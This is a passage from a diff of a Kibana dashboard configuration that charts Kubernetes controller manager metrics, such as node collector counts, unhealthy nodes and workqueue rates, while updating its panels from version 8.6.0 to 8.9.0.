}, + 100 + ], + "location": { + "max": 277, + "min": 0 + }, + "name": "multiply", + "text": "last_value(kubernetes.controllermanager.node.collector.unhealthy.count, kql='kubernetes.controllermanager.node.collector.unhealthy.count: *')/last_value(kubernetes.controllermanager.node.collector.count, kql='kubernetes.controllermanager.node.collector.unhealthy.count: *')*100", + "type": "function" } + }, + "references": [ + "c3ae8ff0-53ae-4da5-9521-b9467df47ed3X0", + "c3ae8ff0-53ae-4da5-9521-b9467df47ed3X1" + ], + "scale": "ratio" } + }, + "incompleteColumns": {} } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "columns": 
[ + { + "alignment": "center", + "columnId": "310bfe34-31c8-4c52-bff0-60450318be7e", + "isTransposed": false + }, + { + "alignment": "center", + "columnId": "28f81466-455c-469d-8c35-b53555ae5e8a", + "isTransposed": false + }, + { + "alignment": "center", + "columnId": "363b1795-4ab4-43e8-87a6-fafe691bddf2", + "isTransposed": false + }, + { + "alignment": "center", + "columnId": "c3ae8ff0-53ae-4da5-9521-b9467df47ed3", + "isTransposed": false + }, + { + "columnId": "6b1f578b-3e83-443b-a2da-b97ecbcd67bb", + "isTransposed": false + } ], + "layerId": "239b73ac-0fc9-44fd-a7c5-2d0281e6b765", + "layerType": "data" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsDatatable" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Node collector" + }, + { + "version": "8.9.0", + "type": "visualization", + "gridData": { + "h": 3, + "i": "0599e0ae-2375-4ceb-b12d-2ebec4310cc6", + "w": 48, + "x": 0, + "y": 10 + }, + "panelIndex": "0599e0ae-2375-4ceb-b12d-2ebec4310cc6", + "embeddableConfig": { + "enhancements": {}, + "hidePanelTitles": true, + "savedVis": { + "data": { + "aggs": [], + "searchSource": { + "filter": [], "query": { - "language": "kuery", - "query": "" + "language": "kuery", + "query": "" } - } + } + }, + "description": "", + "params": { + "axis_formatter": "number", + "axis_position": "left", + "axis_scale": "normal", + "background_color": "rgba(205,245,246,1)", + "drop_last_bucket": 0, + "id": "6f526672-7eb3-4643-b49d-676d2eeac17b", + "index_pattern_ref_name": "metrics_0599e0ae-2375-4ceb-b12d-2ebec4310cc6_0_index_pattern", + "interval": "", + "isModelInvalid": false, + "markdown": "Workqueue", + "markdown_css": "font-family:system-ui,\"Segoe UI\",Helvetica,Arial,sans-serif,\"Segoe UI Emoji\",\"Segoe UI Symbol\";font-weight:500;font-kerning:normal;font-size:36px;font-stretch:100%;font-style:normal;font-variant-caps:normal;font-variant-east-asian:normal;font-variant-ligatures:normal;font-variant-numeric:normal;\np 
{\n text-align: center;\n } a{text-decoration:none !important;}", + "markdown_vertical_align": "middle", + "max_lines_legend": 1, + "series": [ + { + "axis_position": "right", + "chart_type": "line", + "color": "#68BC00", + "fill": 0.5, + "formatter": "default", + "id": "d65c8740-c2c0-4471-9f94-38baadcf2df2", + "line_width": 1, + "metrics": [ + { + "id": "6a297bc8-ba40-4dbe-b5bc-6ca95dc292bb", + "type": "count" + } + ], + "override_index_pattern": 0, + "palette": { + "name": "default", + "type": "palette" + }, + "point_size": 1, + "separate_axis": 0, + "series_drop_last_bucket": 0, + "split_mode": "everything", + "stacked": "none", + "time_range_mode": "entire_time_range" + } + ], + "show_grid": 1, + "show_legend": 1, + "time_field": "", + "time_range_mode": "entire_time_range", + "tooltip_mode": "show_all", + "truncate_legend": 1, + "type": "markdown", + "use_kibana_indexes": true + }, + "title": "", + "type": "metrics", + "uiState": {} + }, + "type": "visualization" }, - "optionsJSON": { - "hidePanelTitles": false, - "syncColors": true, - "syncCursor": true, - "syncTooltips": false, - "useMargins": true + "title": "" + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 14, + "i": "2ba53067-d43d-42eb-ac50-2d941977ce95", + "w": 24, + "x": 0, + "y": 13 }, - "panelsJSON": [ - { - "embeddableConfig": { - "enhancements": {}, - "hidePanelTitles": true, - "savedVis": { - "data": { - "aggs": [], - "searchSource": { - "filter": [], - "query": { - "language": "kuery", - "query": "" - } - } + "panelIndex": "2ba53067-d43d-42eb-ac50-2d941977ce95", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-76c85206-02c1-4f35-bb0d-c1d4d3ee59d7", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "3ed2b7d8-6b77-43b7-8ed3-c52117016d59", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + 
"76c85206-02c1-4f35-bb0d-c1d4d3ee59d7": { + "columnOrder": [ + "f2d3349e-531e-453c-bac7-fc4c1a47ea86", + "4266ba8e-3786-4162-9140-15f600580db0", + "5b2495ee-2297-4e20-81d3-ac385205cb01", + "5b2495ee-2297-4e20-81d3-ac385205cb01X1", + "5b2495ee-2297-4e20-81d3-ac385205cb01X0" + ], + "columns": { + "4266ba8e-3786-4162-9140-15f600580db0": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": true, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" }, - "description": "", - "id": "", - "params": { - "fontSize": 12, - "markdown": "### Controller Manager\n\nThis dashboard collects metrics from [kube controller manager](https://kubernetes.io/docs/concepts/overview/components/#kube-controller-manager) endpoint. Its purpose is to give an overview of what is happening inside it through the controller processes metrics and detect problems that might be happening. \n\n**WARNING**: This dataset **requires access** to the kube controller manager endpoint. Refer [here](https://docs.elastic.co/en/integrations/kubernetes#scheduler-and-controllermanager) to learn how to enable it. 
In some \"As a Service\" Kubernetes implementations, like GKE or AKS, it is **not possible** to access its metrics.", - "openLinksInNewTab": false + "5b2495ee-2297-4e20-81d3-ac385205cb01": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Counter rate", + "operationType": "formula", + "params": { + "formula": "counter_rate(last_value(kubernetes.controllermanager.workqueue.adds.count))", + "isFormulaBroken": false + }, + "references": [ + "5b2495ee-2297-4e20-81d3-ac385205cb01X1" + ], + "scale": "ratio", + "timeScale": "s" }, - "title": "", - "type": "markdown", - "uiState": {} - } - }, - "gridData": { - "h": 10, - "i": "c13eb504-6afb-4fa5-8a7d-a75c5fee15b7", - "w": 23, - "x": 0, - "y": 0 - }, - "panelIndex": "c13eb504-6afb-4fa5-8a7d-a75c5fee15b7", - "type": "visualization", - "version": "8.6.0" - }, - { - "embeddableConfig": { - "enhancements": {}, - "hidePanelTitles": true, - "savedVis": { - "data": { - "aggs": [], - "searchSource": { - "filter": [], - "query": { - "language": "kuery", - "query": "" - } - } + "5b2495ee-2297-4e20-81d3-ac385205cb01X0": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.controllermanager.workqueue.adds.count: *" + }, + "isBucketed": false, + "label": "Part of Counter rate", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.controllermanager.workqueue.adds.count" }, - "description": "", - "params": { - "axis_formatter": "number", - "axis_position": "left", - "axis_scale": "normal", - "background_color": "rgba(203,228,249,1)", - "drop_last_bucket": 0, - "id": "6f526672-7eb3-4643-b49d-676d2eeac17b", - "index_pattern_ref_name": "metrics_ff6afcdf-0de2-47fb-aa9e-72b48f11e0cd_0_index_pattern", - "interval": "", - "isModelInvalid": false, - "markdown": "Cluster nodes", - "markdown_css": "font-family:system-ui,\"Segoe UI\",Helvetica,Arial,sans-serif,\"Segoe UI Emoji\",\"Segoe 
UI Symbol\";font-weight:500;font-kerning:normal;font-size:36px;font-stretch:100%;font-style:normal;font-variant-caps:normal;font-variant-east-asian:normal;font-variant-ligatures:normal;font-variant-numeric:normal;\np {\n text-align: center;\n } a{text-decoration:none !important;}", - "markdown_vertical_align": "middle", - "max_lines_legend": 1, - "series": [ - { - "axis_position": "right", - "chart_type": "line", - "color": "#68BC00", - "fill": 0.5, - "formatter": "default", - "id": "d65c8740-c2c0-4471-9f94-38baadcf2df2", - "line_width": 1, - "metrics": [ - { - "id": "6a297bc8-ba40-4dbe-b5bc-6ca95dc292bb", - "type": "count" - } - ], - "override_index_pattern": 0, - "palette": { - "name": "default", - "type": "palette" - }, - "point_size": 1, - "separate_axis": 0, - "series_drop_last_bucket": 0, - "split_mode": "everything", - "stacked": "none", - "time_range_mode": "entire_time_range" - } - ], - "show_grid": 1, - "show_legend": 1, - "time_field": "", - "time_range_mode": "entire_time_range", - "tooltip_mode": "show_all", - "truncate_legend": 1, - "type": "markdown", - "use_kibana_indexes": true + "5b2495ee-2297-4e20-81d3-ac385205cb01X1": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of Counter rate", + "operationType": "counter_rate", + "references": [ + "5b2495ee-2297-4e20-81d3-ac385205cb01X0" + ], + "scale": "ratio", + "timeScale": "s" }, - "title": "", - "type": "metrics", - "uiState": {} + "f2d3349e-531e-453c-bac7-fc4c1a47ea86": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Workqueues", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "fallback": false, + "type": "alphabetical" + }, + "orderDirection": "asc", + "otherBucket": false, + "parentFormat": { + "id": "terms" + }, + "secondaryFields": [], + "size": 10 + }, + "scale": "ordinal", + "sourceField": "kubernetes.controllermanager.name" + } + }, + "incompleteColumns": {} } + } + } + }, + 
"filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true }, - "gridData": { - "h": 3, - "i": "ff6afcdf-0de2-47fb-aa9e-72b48f11e0cd", - "w": 25, - "x": 23, - "y": 0 + "curveType": "LINEAR", + "layers": [ + { + "accessors": [ + "5b2495ee-2297-4e20-81d3-ac385205cb01" + ], + "layerId": "76c85206-02c1-4f35-bb0d-c1d4d3ee59d7", + "layerType": "data", + "palette": { + "name": "kibana_palette", + "type": "palette" + }, + "position": "top", + "seriesType": "line", + "showGridlines": false, + "splitAccessor": "f2d3349e-531e-453c-bac7-fc4c1a47ea86", + "xAccessor": "4266ba8e-3786-4162-9140-15f600580db0" + } + ], + "legend": { + "isVisible": true, + "maxLines": 1, + "position": "right", + "shouldTruncate": true }, - "panelIndex": "ff6afcdf-0de2-47fb-aa9e-72b48f11e0cd", - "title": "", - "type": "visualization", - "version": "8.6.0" + "preferredSeriesType": "bar_stacked", + "title": "Empty XY chart", + "valueLabels": "hide", + "xTitle": "", + "yTitle": "" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-239b73ac-0fc9-44fd-a7c5-2d0281e6b765", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "239b73ac-0fc9-44fd-a7c5-2d0281e6b765": { - "columnOrder": [ - "310bfe34-31c8-4c52-bff0-60450318be7e", - "28f81466-455c-469d-8c35-b53555ae5e8a", - "363b1795-4ab4-43e8-87a6-fafe691bddf2", - "c3ae8ff0-53ae-4da5-9521-b9467df47ed3", - "6b1f578b-3e83-443b-a2da-b97ecbcd67bb", - "c3ae8ff0-53ae-4da5-9521-b9467df47ed3X2", - "c3ae8ff0-53ae-4da5-9521-b9467df47ed3X1", - "c3ae8ff0-53ae-4da5-9521-b9467df47ed3X0", - "363b1795-4ab4-43e8-87a6-fafe691bddf2X0", - "6b1f578b-3e83-443b-a2da-b97ecbcd67bbX0" - ], - "columns": { - "28f81466-455c-469d-8c35-b53555ae5e8a": { - "customLabel": true, - "dataType": 
"string", - "isBucketed": true, - "label": "Zone", - "operationType": "terms", - "params": { - "missingBucket": true, - "orderBy": { - "fallback": true, - "type": "alphabetical" - }, - "orderDirection": "asc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - "size": 5 - }, - "scale": "ordinal", - "sourceField": "kubernetes.controllermanager.zone" - }, - "310bfe34-31c8-4c52-bff0-60450318be7e": { - "customLabel": true, - "dataType": "string", - "isBucketed": true, - "label": "Cluster", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "fallback": true, - "type": "alphabetical" - }, - "orderDirection": "asc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - "size": 3 - }, - "scale": "ordinal", - "sourceField": "orchestrator.cluster.name" - }, - "363b1795-4ab4-43e8-87a6-fafe691bddf2": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Total nodes", - "operationType": "formula", - "params": { - "formula": "last_value(kubernetes.controllermanager.node.collector.count, kql='kubernetes.controllermanager.node.collector.count: *')", - "isFormulaBroken": false - }, - "references": [ - "363b1795-4ab4-43e8-87a6-fafe691bddf2X0" - ], - "scale": "ratio" - }, - "363b1795-4ab4-43e8-87a6-fafe691bddf2X0": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.controllermanager.node.collector.count: *" - }, - "isBucketed": false, - "label": "Part of Total nodes", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.controllermanager.node.collector.count" - }, - "6b1f578b-3e83-443b-a2da-b97ecbcd67bb": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Node evictions", - "operationType": "formula", - "params": { - "formula": "last_value(kubernetes.controllermanager.node.collector.eviction.count, 
kql='kubernetes.controllermanager.node.collector.eviction.count: *')", - "isFormulaBroken": false - }, - "references": [ - "6b1f578b-3e83-443b-a2da-b97ecbcd67bbX0" - ], - "scale": "ratio" - }, - "6b1f578b-3e83-443b-a2da-b97ecbcd67bbX0": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.controllermanager.node.collector.eviction.count: *" - }, - "isBucketed": false, - "label": "Part of Node evictions", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.controllermanager.node.collector.eviction.count" - }, - "c3ae8ff0-53ae-4da5-9521-b9467df47ed3": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Unhealthy nodes", - "operationType": "formula", - "params": { - "format": { - "id": "percent", - "params": { - "decimals": 1 - } - }, - "formula": "last_value(kubernetes.controllermanager.node.collector.unhealthy.count, kql='kubernetes.controllermanager.node.collector.unhealthy.count: *')/last_value(kubernetes.controllermanager.node.collector.count, kql='kubernetes.controllermanager.node.collector.unhealthy.count: *')*100", - "isFormulaBroken": false - }, - "references": [ - "c3ae8ff0-53ae-4da5-9521-b9467df47ed3X2" - ], - "scale": "ratio" - }, - "c3ae8ff0-53ae-4da5-9521-b9467df47ed3X0": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.controllermanager.node.collector.unhealthy.count: *" - }, - "isBucketed": false, - "label": "Part of Unhealthy nodes", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.controllermanager.node.collector.unhealthy.count" - }, - "c3ae8ff0-53ae-4da5-9521-b9467df47ed3X1": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.controllermanager.node.collector.unhealthy.count: *" - }, - 
"isBucketed": false, - "label": "Part of Unhealthy nodes", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.controllermanager.node.collector.count" - }, - "c3ae8ff0-53ae-4da5-9521-b9467df47ed3X2": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of Unhealthy nodes", - "operationType": "math", - "params": { - "tinymathAst": { - "args": [ - { - "args": [ - "c3ae8ff0-53ae-4da5-9521-b9467df47ed3X0", - "c3ae8ff0-53ae-4da5-9521-b9467df47ed3X1" - ], - "name": "divide", - "type": "function" - }, - 100 - ], - "location": { - "max": 277, - "min": 0 - }, - "name": "multiply", - "text": "last_value(kubernetes.controllermanager.node.collector.unhealthy.count, kql='kubernetes.controllermanager.node.collector.unhealthy.count: *')/last_value(kubernetes.controllermanager.node.collector.count, kql='kubernetes.controllermanager.node.collector.unhealthy.count: *')*100", - "type": "function" - } - }, - "references": [ - "c3ae8ff0-53ae-4da5-9521-b9467df47ed3X0", - "c3ae8ff0-53ae-4da5-9521-b9467df47ed3X1" - ], - "scale": "ratio" - } - }, - "incompleteColumns": {} - } - } - } + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Workqueue additions increase rate" + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 14, + "i": "1cd3ebab-9630-4253-b9a6-5f921e5cb617", + "w": 24, + "x": 24, + "y": 13 + }, + "panelIndex": "1cd3ebab-9630-4253-b9a6-5f921e5cb617", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-77b347b2-91fa-470f-861d-ada0e175cbc4", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "b460c8d2-ab24-41ed-aac8-998febec263b", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + 
"77b347b2-91fa-470f-861d-ada0e175cbc4": { + "columnOrder": [ + "68f1dece-b63b-4a27-9c1f-8068f2f9bedb", + "34f7328b-5fef-43e7-9350-98256b031a79", + "a1a9d92a-c7cc-43f4-950a-25dd5108bf71", + "a1a9d92a-c7cc-43f4-950a-25dd5108bf71X1", + "a1a9d92a-c7cc-43f4-950a-25dd5108bf71X0" + ], + "columns": { + "34f7328b-5fef-43e7-9350-98256b031a79": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": true, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "68f1dece-b63b-4a27-9c1f-8068f2f9bedb": { + "dataType": "string", + "isBucketed": true, + "label": "Top values of kubernetes.controllermanager.name + 1 other", + "operationType": "terms", + "params": { + "accuracyMode": false, + "missingBucket": false, + "orderAgg": { + "dataType": "number", + "isBucketed": false, + "label": "Maximum of kubernetes.controllermanager.workqueue.retries.count", + "operationType": "max", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "kubernetes.controllermanager.workqueue.retries.count" }, - "filters": [], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderBy": { + "type": "custom" }, - "visualization": { - "columns": [ - { - "alignment": "center", - "columnId": "310bfe34-31c8-4c52-bff0-60450318be7e", - "isTransposed": false - }, - { - "alignment": "center", - "columnId": "28f81466-455c-469d-8c35-b53555ae5e8a", - "isTransposed": false - }, - { - "alignment": "center", - "columnId": "363b1795-4ab4-43e8-87a6-fafe691bddf2", - "isTransposed": false - }, - { - "alignment": "center", - "columnId": "c3ae8ff0-53ae-4da5-9521-b9467df47ed3", - "isTransposed": false - }, - { - "columnId": "6b1f578b-3e83-443b-a2da-b97ecbcd67bb", - "isTransposed": false - } - ], - "layerId": "239b73ac-0fc9-44fd-a7c5-2d0281e6b765", - "layerType": "data" - } + "orderDirection": "desc", + "otherBucket": false, + 
"parentFormat": { + "id": "multi_terms" + }, + "secondaryFields": [ + "host.name" + ], + "size": 10 + }, + "scale": "ordinal", + "sourceField": "kubernetes.controllermanager.name" }, - "title": "", - "type": "lens", - "visualizationType": "lnsDatatable" - }, - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 7, - "i": "aef813b5-85d5-46c9-a86a-2e273806d488", - "w": 25, - "x": 23, - "y": 3 - }, - "panelIndex": "aef813b5-85d5-46c9-a86a-2e273806d488", - "title": "Node collector", - "type": "lens", - "version": "8.6.0" - }, - { - "embeddableConfig": { - "enhancements": {}, - "hidePanelTitles": true, - "savedVis": { - "data": { - "aggs": [], - "searchSource": { - "filter": [], - "query": { - "language": "kuery", - "query": "" - } - } + "a1a9d92a-c7cc-43f4-950a-25dd5108bf71": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Rate", + "operationType": "formula", + "params": { + "formula": "counter_rate(last_value(kubernetes.controllermanager.workqueue.retries.count))", + "isFormulaBroken": false + }, + "references": [ + "a1a9d92a-c7cc-43f4-950a-25dd5108bf71X1" + ], + "scale": "ratio", + "timeScale": "s" }, - "description": "", - "params": { - "axis_formatter": "number", - "axis_position": "left", - "axis_scale": "normal", - "background_color": "rgba(205,245,246,1)", - "drop_last_bucket": 0, - "id": "6f526672-7eb3-4643-b49d-676d2eeac17b", - "index_pattern_ref_name": "metrics_0599e0ae-2375-4ceb-b12d-2ebec4310cc6_0_index_pattern", - "interval": "", - "isModelInvalid": false, - "markdown": "Workqueue", - "markdown_css": "font-family:system-ui,\"Segoe UI\",Helvetica,Arial,sans-serif,\"Segoe UI Emoji\",\"Segoe UI Symbol\";font-weight:500;font-kerning:normal;font-size:36px;font-stretch:100%;font-style:normal;font-variant-caps:normal;font-variant-east-asian:normal;font-variant-ligatures:normal;font-variant-numeric:normal;\np {\n text-align: center;\n } a{text-decoration:none !important;}", - "markdown_vertical_align": 
"middle", - "max_lines_legend": 1, - "series": [ - { - "axis_position": "right", - "chart_type": "line", - "color": "#68BC00", - "fill": 0.5, - "formatter": "default", - "id": "d65c8740-c2c0-4471-9f94-38baadcf2df2", - "line_width": 1, - "metrics": [ - { - "id": "6a297bc8-ba40-4dbe-b5bc-6ca95dc292bb", - "type": "count" - } - ], - "override_index_pattern": 0, - "palette": { - "name": "default", - "type": "palette" - }, - "point_size": 1, - "separate_axis": 0, - "series_drop_last_bucket": 0, - "split_mode": "everything", - "stacked": "none", - "time_range_mode": "entire_time_range" - } - ], - "show_grid": 1, - "show_legend": 1, - "time_field": "", - "time_range_mode": "entire_time_range", - "tooltip_mode": "show_all", - "truncate_legend": 1, - "type": "markdown", - "use_kibana_indexes": true + "a1a9d92a-c7cc-43f4-950a-25dd5108bf71X0": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.controllermanager.workqueue.retries.count: *" + }, + "isBucketed": false, + "label": "Part of Rate", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.controllermanager.workqueue.retries.count" }, - "title": "", - "type": "metrics", - "uiState": {} + "a1a9d92a-c7cc-43f4-950a-25dd5108bf71X1": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of Rate", + "operationType": "counter_rate", + "references": [ + "a1a9d92a-c7cc-43f4-950a-25dd5108bf71X0" + ], + "scale": "ratio", + "timeScale": "s" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "b460c8d2-ab24-41ed-aac8-998febec263b", + "key": "kubernetes.controllermanager.workqueue.retries.count", + "negate": false, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "kubernetes.controllermanager.workqueue.retries.count" 
} + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true }, - "gridData": { - "h": 3, - "i": "0599e0ae-2375-4ceb-b12d-2ebec4310cc6", - "w": 48, - "x": 0, - "y": 10 + "layers": [ + { + "accessors": [ + "a1a9d92a-c7cc-43f4-950a-25dd5108bf71" + ], + "layerId": "77b347b2-91fa-470f-861d-ada0e175cbc4", + "layerType": "data", + "palette": { + "name": "kibana_palette", + "type": "palette" + }, + "position": "top", + "seriesType": "line", + "showGridlines": false, + "splitAccessor": "68f1dece-b63b-4a27-9c1f-8068f2f9bedb", + "xAccessor": "34f7328b-5fef-43e7-9350-98256b031a79" + } + ], + "legend": { + "isVisible": true, + "position": "right", + "shouldTruncate": true }, - "panelIndex": "0599e0ae-2375-4ceb-b12d-2ebec4310cc6", - "title": "", - "type": "visualization", - "version": "8.6.0" + "preferredSeriesType": "bar_stacked", + "title": "Empty XY chart", + "valueLabels": "hide", + "xTitle": "", + "yTitle": "" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-76c85206-02c1-4f35-bb0d-c1d4d3ee59d7", - "type": "index-pattern" + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Workqueue retries increase rate" + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 14, + "i": "3a26dffa-0696-485d-b991-1dbc5092082e", + "w": 24, + "x": 0, + "y": 27 + }, + "panelIndex": "3a26dffa-0696-485d-b991-1dbc5092082e", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-2b80230c-9cc8-444f-b092-1fbc4d764992", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "7e0ad24d-199f-4ede-8b71-90152913fa90", + "type": "index-pattern" + } + ], + "state": { + 
"adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "2b80230c-9cc8-444f-b092-1fbc4d764992": { + "columnOrder": [ + "e7259e4c-0700-48a5-aeff-993fc075bcab", + "7b8d9b03-439b-4171-8b64-91b8664b4b94", + "725088f8-ac91-4df6-8863-f9abe7ad40cd", + "725088f8-ac91-4df6-8863-f9abe7ad40cdX0", + "725088f8-ac91-4df6-8863-f9abe7ad40cdX1" + ], + "columns": { + "725088f8-ac91-4df6-8863-f9abe7ad40cd": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Depth", + "operationType": "formula", + "params": { + "formula": "differences(average(kubernetes.controllermanager.workqueue.depth.count, kql='kubernetes.controllermanager.workqueue.depth.count: *'))", + "isFormulaBroken": false + }, + "references": [ + "725088f8-ac91-4df6-8863-f9abe7ad40cdX1" + ], + "scale": "ratio", + "timeScale": "s" + }, + "725088f8-ac91-4df6-8863-f9abe7ad40cdX0": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.controllermanager.workqueue.depth.count: *" + }, + "isBucketed": false, + "label": "Part of Depth", + "operationType": "average", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "kubernetes.controllermanager.workqueue.depth.count" + }, + "725088f8-ac91-4df6-8863-f9abe7ad40cdX1": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of Depth", + "operationType": "differences", + "references": [ + "725088f8-ac91-4df6-8863-f9abe7ad40cdX0" + ], + "scale": "ratio" + }, + "7b8d9b03-439b-4171-8b64-91b8664b4b94": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": true, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "e7259e4c-0700-48a5-aeff-993fc075bcab": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Depth", + "operationType": "terms", + 
"params": { + "accuracyMode": false, + "missingBucket": false, + "orderAgg": { + "dataType": "number", + "isBucketed": false, + "label": "Sum of kubernetes.controllermanager.workqueue.depth.count", + "operationType": "sum", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "kubernetes.controllermanager.workqueue.depth.count" }, - { - "id": "metrics-*", - "name": "3ed2b7d8-6b77-43b7-8ed3-c52117016d59", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "76c85206-02c1-4f35-bb0d-c1d4d3ee59d7": { - "columnOrder": [ - "f2d3349e-531e-453c-bac7-fc4c1a47ea86", - "4266ba8e-3786-4162-9140-15f600580db0", - "5b2495ee-2297-4e20-81d3-ac385205cb01", - "5b2495ee-2297-4e20-81d3-ac385205cb01X1", - "5b2495ee-2297-4e20-81d3-ac385205cb01X0" - ], - "columns": { - "4266ba8e-3786-4162-9140-15f600580db0": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": true, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "5b2495ee-2297-4e20-81d3-ac385205cb01": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Counter rate", - "operationType": "formula", - "params": { - "formula": "counter_rate(last_value(kubernetes.controllermanager.workqueue.adds.count))", - "isFormulaBroken": false - }, - "references": [ - "5b2495ee-2297-4e20-81d3-ac385205cb01X1" - ], - "scale": "ratio", - "timeScale": "s" - }, - "5b2495ee-2297-4e20-81d3-ac385205cb01X0": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.controllermanager.workqueue.adds.count: *" - }, - "isBucketed": false, - "label": "Part of Counter rate", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": 
